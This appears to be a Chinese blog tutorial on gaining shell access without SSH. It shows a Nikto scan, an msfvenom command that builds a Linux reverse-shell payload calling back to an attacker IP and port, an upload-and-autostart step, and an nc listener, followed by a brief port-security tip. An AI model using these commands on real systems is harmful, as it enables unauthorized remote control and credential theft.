当前位置: 首页 > news >正文

黑客是如何绕过ssh登录目标站点

      黑客绕过SSH登录目标站点的手法多种多样,其中一些技术不仅复杂且极具隐蔽性,严重威胁着网络安全。SSH(安全外壳协议)作为一种广泛使用的远程登录协议,虽然本身具备一定的安全特性,但仍然是黑客攻击的重要目标之一。黑客通过利用SSH协议的特点和存在的安全漏洞,采取包括SSH欺骗、暴力破解密码、设置SSH后门以及绕过身份验证机制等多种手段,实现对目标站点的非法访问和控制。
      接下来,我们将深入探讨黑客如何利用这些手段绕过SSH登录目标站点,以便更好地理解其背后的技术原理和防御策略。这不仅有助于提升网络安全意识,也为制定相应的防护措施提供了宝贵的参考。

Nikto介绍

一个开源的 Web 服务器扫描器,它就像你网络安全工具箱中的瑞士军刀,帮助你发现潜在的安全漏洞。

望获系统安装nikto:

dnf install nikto

扫描目标

假设你有一个目标网站,比如 `http://example.com`。让我们开始扫描吧:

nikto -h http://example.com

扫描结果

扫描完成后,Nikto 会输出一些信息,比如:

找到的潜在漏洞

安全配置问题

  默认的 Web 应用程序和目录

每一条信息都是你冒险中的发现,帮助你更好地了解目标系统。

找到一个上传文件漏洞

从nikto找到一个上传文件漏洞。需要查阅对应服务器版本以及相关已修复漏洞。在此只做原理性解释和介绍。

重点:生成木马

使用metasploit工具msfvenom创建:

msfvenom -p linux/x64/shell_reverse_tcp -f elf lhost=192.168.77.133 lport=4444 > x64-re-shell

-p 指定平台为64位x86,系统为linux

-f  payload格式

lhost 黑客ip

lport 黑客设备的端口

根据小节4中的上传漏洞上传该木马并设置开机启动

演示

黑客设备上监听4444端口,执行:

nc -l -p 4444

受害者设备启动模拟:

黑客设备端显示:

黑客端拿下/etc/passwd。

总结

黑客绕过ssh加密认证登录,通过上传reverse shell拿下受害者设备。

防范措施:

通过端口安全管理,只开放经过安全认证的端口,快去看看你的设备端口有没有连接陌生ip。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 【linux】4张卡,坏了1张,怎么办?
  • Vue使用代理方式解决跨域问题
  • 【Git】Git Commit Angular规范详解
  • win10下使用docker、k8s部署java应用
  • 【HTML元素居中】元素水平垂直居中的常用方法
  • ‌内网穿透技术‌总结
  • Python知识点:使用Cython进行Python性能优化
  • VSCode 离线安装中文语言包
  • 基于springboot+vue超市管理系统
  • Sharding-Jdbc+Mybatis+SpringBoot的分库分表实现
  • Vue学习记录之六(组件实战及BEM框架了解)
  • STM32巡回研讨会总结(2024)
  • [000-01-008].第05节:OpenFeign特性-重试机制
  • LeetCode题练习与总结: 数字 1 的个数--233
  • Resnet50网络——口腔癌病变识别
  • Angular4 模板式表单用法以及验证
  • canvas 高仿 Apple Watch 表盘
  • css布局,左右固定中间自适应实现
  • CSS实用技巧
  • Fastjson的基本使用方法大全
  • httpie使用详解
  • Redux 中间件分析
  • UEditor初始化失败(实例已存在,但视图未渲染出来,单页化)
  • VUE es6技巧写法(持续更新中~~~)
  • 分享自己折腾多时的一套 vue 组件 --we-vue
  • 诡异!React stopPropagation失灵
  • 简单易用的leetcode开发测试工具(npm)
  • 你不可错过的前端面试题(一)
  • 小程序上传图片到七牛云(支持多张上传,预览,删除)
  • 基于django的视频点播网站开发-step3-注册登录功能 ...
  • 资深实践篇 | 基于Kubernetes 1.61的Kubernetes Scheduler 调度详解 ...
  • ​软考-高级-系统架构设计师教程(清华第2版)【第12章 信息系统架构设计理论与实践(P420~465)-思维导图】​
  • !!【OpenCV学习】计算两幅图像的重叠区域
  • #DBA杂记1
  • #pragma pack(1)
  • #我与Java虚拟机的故事#连载05:Java虚拟机的修炼之道
  • (3)(3.2) MAVLink2数据包签名(安全)
  • (教学思路 C#之类三)方法参数类型(ref、out、parmas)
  • (每日一问)基础知识:堆与栈的区别
  • (区间dp) (经典例题) 石子合并
  • (十八)SpringBoot之发送QQ邮件
  • (四)模仿学习-完成后台管理页面查询
  • (一)Spring Cloud 直击微服务作用、架构应用、hystrix降级
  • (原+转)Ubuntu16.04软件中心闪退及wifi消失
  • (原创)可支持最大高度的NestedScrollView
  • ***汇编语言 实验16 编写包含多个功能子程序的中断例程
  • .bat批处理(六):替换字符串中匹配的子串
  • .NET 4 并行(多核)“.NET研究”编程系列之二 从Task开始
  • .Net Core缓存组件(MemoryCache)源码解析
  • .net 受管制代码
  • .NET 中 GetHashCode 的哈希值有多大概率会相同(哈希碰撞)
  • .NET/C# 使用 #if 和 Conditional 特性来按条件编译代码的不同原理和适用场景
  • .NET3.5下用Lambda简化跨线程访问窗体控件,避免繁复的delegate,Invoke(转)
  • .NET8 动态添加定时任务(CRON Expression, Whatever)
  • .NET成年了,然后呢?